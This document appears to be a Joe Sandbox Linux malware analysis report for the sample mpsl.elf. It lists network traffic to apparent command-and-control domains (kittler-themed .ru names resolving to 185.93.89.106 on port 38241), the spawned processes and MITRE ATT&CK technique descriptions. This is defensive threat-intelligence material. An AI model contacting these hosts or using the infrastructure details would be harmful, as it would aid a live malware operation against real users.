Feb 10, 2025 21:08:40.246001959 CET	38241	39830	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:40.856921911 CET	38241	39830	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:40.856992006 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:40.857028008 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:41.865583897 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:41.870359898 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:41.870408058 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:41.871026993 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:41.875768900 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:41.875813961 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:41.880582094 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:42.493860960 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:42.494009018 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:42.494030952 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:43.408559084 CET	42836	443	192.168.2.23	91.189.91.43
Feb 10, 2025 21:08:43.502046108 CET	39834	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:43.506890059 CET	38241	39834	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:43.506943941 CET	39834	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:43.507509947 CET	39834	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:43.512305975 CET	38241	39834	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:43.512388945 CET	39834	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:43.517141104 CET	38241	39834	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:44.120965004 CET	38241	39834	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:44.121037006 CET	39834	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:44.121073008 CET	39834	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:45.177984953 CET	39836	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:45.183707952 CET	38241	39836	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:45.183770895 CET	39836	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:45.184461117 CET	39836	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:45.189239025 CET	38241	39836	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:45.189292908 CET	39836	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:45.194047928 CET	38241	39836	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:45.788135052 CET	38241	39836	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:45.788271904 CET	39836	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:45.788315058 CET	39836	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:46.796659946 CET	39838	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:46.801441908 CET	38241	39838	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:46.801496983 CET	39838	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:46.802066088 CET	39838	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:46.806797028 CET	38241	39838	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:46.806848049 CET	39838	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:46.811614037 CET	38241	39838	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:49.551817894 CET	42516	80	192.168.2.23	109.202.202.202
Feb 10, 2025 21:08:56.810877085 CET	39838	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:56.815673113 CET	38241	39838	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:56.984003067 CET	38241	39838	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:56.984206915 CET	39838	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:09:14.124475002 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 21:09:57.022561073 CET	39838	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:09:57.027432919 CET	38241	39838	185.93.89.106	192.168.2.23
Feb 10, 2025 21:09:57.200627089 CET	38241	39838	185.93.89.106	192.168.2.23
Feb 10, 2025 21:09:57.200789928 CET	39838	38241	192.168.2.23	185.93.89.106

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2025 21:08:10.520950079 CET	58572	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:10.650227070 CET	53	58572	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:12.358704090 CET	54514	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:12.500832081 CET	53	54514	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:14.437884092 CET	38161	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:14.491544962 CET	53	38161	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:16.132406950 CET	46067	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:16.138947010 CET	53	46067	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:17.751856089 CET	45825	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:17.761528015 CET	53	45825	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:19.372587919 CET	35143	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:19.380474091 CET	53	35143	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:20.993055105 CET	39863	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:20.999267101 CET	53	39863	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:22.627453089 CET	43017	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:22.633687973 CET	53	43017	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:24.271878004 CET	33893	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:24.278270960 CET	53	33893	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:26.061697006 CET	56917	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:26.071985960 CET	53	56917	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:27.715626001 CET	43726	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:27.723109961 CET	53	43726	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:29.354259968 CET	34447	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:29.462342024 CET	53	34447	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:32.040360928 CET	38675	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:32.047696114 CET	53	38675	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:33.669928074 CET	46425	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:33.676271915 CET	53	46425	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:35.346399069 CET	41873	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:35.353346109 CET	53	41873	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:36.966267109 CET	43164	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:36.972577095 CET	53	43164	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:38.588310957 CET	38296	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:38.594436884 CET	53	38296	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:40.224253893 CET	38026	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:40.230556011 CET	53	38026	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:41.858511925 CET	52880	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:41.865231991 CET	53	52880	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:43.495521069 CET	59475	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:43.501693010 CET	53	59475	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:45.122529984 CET	57065	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:45.177478075 CET	53	57065	8.8.8.8	192.168.2.23
Feb 10, 2025 21:08:46.789988995 CET	40471	53	192.168.2.23	8.8.8.8
Feb 10, 2025 21:08:46.796317101 CET	53	40471	8.8.8.8	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 10, 2025 21:08:10.520950079 CET	192.168.2.23	8.8.8.8	0xc377	Standard query (0)	newkittler.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 21:08:12.358704090 CET	192.168.2.23	8.8.8.8	0xc78c	Standard query (0)	gokittler.ru. [malformed]	256	428	false
Feb 10, 2025 21:08:14.437884092 CET	192.168.2.23	8.8.8.8	0xcdb6	Standard query (0)	cats-master.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 21:08:16.132406950 CET	192.168.2.23	8.8.8.8	0x5402	Standard query (0)	kittler.ru. [malformed]	256	432	false
Feb 10, 2025 21:08:17.751856089 CET	192.168.2.23	8.8.8.8	0xd419	Standard query (0)	kittlerer.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 21:08:19.372587919 CET	192.168.2.23	8.8.8.8	0xc955	Standard query (0)	cats-master.ru. [malformed]	256	435	false
Feb 10, 2025 21:08:20.993055105 CET	192.168.2.23	8.8.8.8	0x1149	Standard query (0)	thekittler.ru. [malformed]	256	436	false
Feb 10, 2025 21:08:22.627453089 CET	192.168.2.23	8.8.8.8	0x11ec	Standard query (0)	qittler.ru. [malformed]	256	438	false
Feb 10, 2025 21:08:24.271878004 CET	192.168.2.23	8.8.8.8	0xc2ac	Standard query (0)	kittler.ru. [malformed]	256	440	false
Feb 10, 2025 21:08:26.061697006 CET	192.168.2.23	8.8.8.8	0xd440	Standard query (0)	cats-master.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 21:08:27.715626001 CET	192.168.2.23	8.8.8.8	0x920b	Standard query (0)	thekittler.ru. [malformed]	256	443	false
Feb 10, 2025 21:08:29.354259968 CET	192.168.2.23	8.8.8.8	0x17ca	Standard query (0)	cuttiecats.ru. [malformed]	256	445	false
Feb 10, 2025 21:08:32.040360928 CET	192.168.2.23	8.8.8.8	0x73e1	Standard query (0)	polizei.su. [malformed]	256	448	false
Feb 10, 2025 21:08:33.669928074 CET	192.168.2.23	8.8.8.8	0x48b	Standard query (0)	kittlez.ru. [malformed]	256	449	false
Feb 10, 2025 21:08:35.346399069 CET	192.168.2.23	8.8.8.8	0xca24	Standard query (0)	cuttiecats.ru. [malformed]	256	451	false
Feb 10, 2025 21:08:36.966267109 CET	192.168.2.23	8.8.8.8	0x35f3	Standard query (0)	thekittler.ru. [malformed]	256	452	false
Feb 10, 2025 21:08:38.588310957 CET	192.168.2.23	8.8.8.8	0x481b	Standard query (0)	thekittler.ru. [malformed]	256	454	false
Feb 10, 2025 21:08:40.224253893 CET	192.168.2.23	8.8.8.8	0x64cf	Standard query (0)	mykittler.ru. [malformed]	256	456	false
Feb 10, 2025 21:08:41.858511925 CET	192.168.2.23	8.8.8.8	0x5a8d	Standard query (0)	cat-are-here.ru. [malformed]	256	457	false
Feb 10, 2025 21:08:43.495521069 CET	192.168.2.23	8.8.8.8	0xb92d	Standard query (0)	mykittler.ru. [malformed]	256	459	false
Feb 10, 2025 21:08:45.122529984 CET	192.168.2.23	8.8.8.8	0xbb6a	Standard query (0)	newkittler.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 21:08:46.789988995 CET	192.168.2.23	8.8.8.8	0x9856	Standard query (0)	qittler.ru. [malformed]	256	462	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 10, 2025 21:08:10.650227070 CET	8.8.8.8	192.168.2.23	0xc377	No error (0)	newkittler.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 21:08:14.491544962 CET	8.8.8.8	192.168.2.23	0xcdb6	No error (0)	cats-master.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 21:08:17.761528015 CET	8.8.8.8	192.168.2.23	0xd419	No error (0)	kittlerer.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 21:08:26.071985960 CET	8.8.8.8	192.168.2.23	0xd440	No error (0)	cats-master.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 21:08:45.177478075 CET	8.8.8.8	192.168.2.23	0xbb6a	No error (0)	newkittler.ru	185.93.89.106	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: mpsl.elf PID: 6236, Parent PID: 6160

General

Start time (UTC):	20:08:08
Start date (UTC):	10/02/2025
Path:	/tmp/mpsl.elf
Arguments:	/tmp/mpsl.elf
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	20:08:08
Start date (UTC):	10/02/2025
Path:	/tmp/mpsl.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	20:08:08
Start date (UTC):	10/02/2025
Path:	/tmp/mpsl.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	20:08:09
Start date (UTC):	10/02/2025
Path:	/tmp/mpsl.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	20:08:09
Start date (UTC):	10/02/2025
Path:	/tmp/mpsl.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	20:08:09
Start date (UTC):	10/02/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	20:08:09
Start date (UTC):	10/02/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	20:08:09
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/rm
Arguments:	rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfwm4
Arguments:	xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
File size:	420424 bytes
MD5 hash:	59defa3c00cc30d85ed77b738d55e9da

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfdesktop
Arguments:	xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
File size:	473520 bytes
MD5 hash:	dfb13e1581f80065dcea16f2476f16f2

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-panel
Arguments:	xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfwm4
Arguments:	xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
File size:	420424 bytes
MD5 hash:	59defa3c00cc30d85ed77b738d55e9da

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:10
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfwm4
Arguments:	xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
File size:	420424 bytes
MD5 hash:	59defa3c00cc30d85ed77b738d55e9da

Start time (UTC):	20:08:11
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	20:08:11
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfdesktop
Arguments:	xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
File size:	473520 bytes
MD5 hash:	dfb13e1581f80065dcea16f2476f16f2

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
Tactics:	Credential Access
Data Sources:	Application Log: Application Log Content, Command: Command Execution, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report mpsl.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: mpsl.elf PID: 6236, Parent PID: 6160

General

Chronological Activities

Analysis Process: mpsl.elf PID: 6239, Parent PID: 6236

General

Chronological Activities

Analysis Process: mpsl.elf PID: 6241, Parent PID: 6239

General

Chronological Activities

Analysis Process: mpsl.elf PID: 6245, Parent PID: 6239

General

Chronological Activities

Analysis Process: mpsl.elf PID: 6246, Parent PID: 6239

General

Chronological Activities

Analysis Process: gdm3 PID: 6271, Parent PID: 1320

Linux Analysis Report
mpsl.elf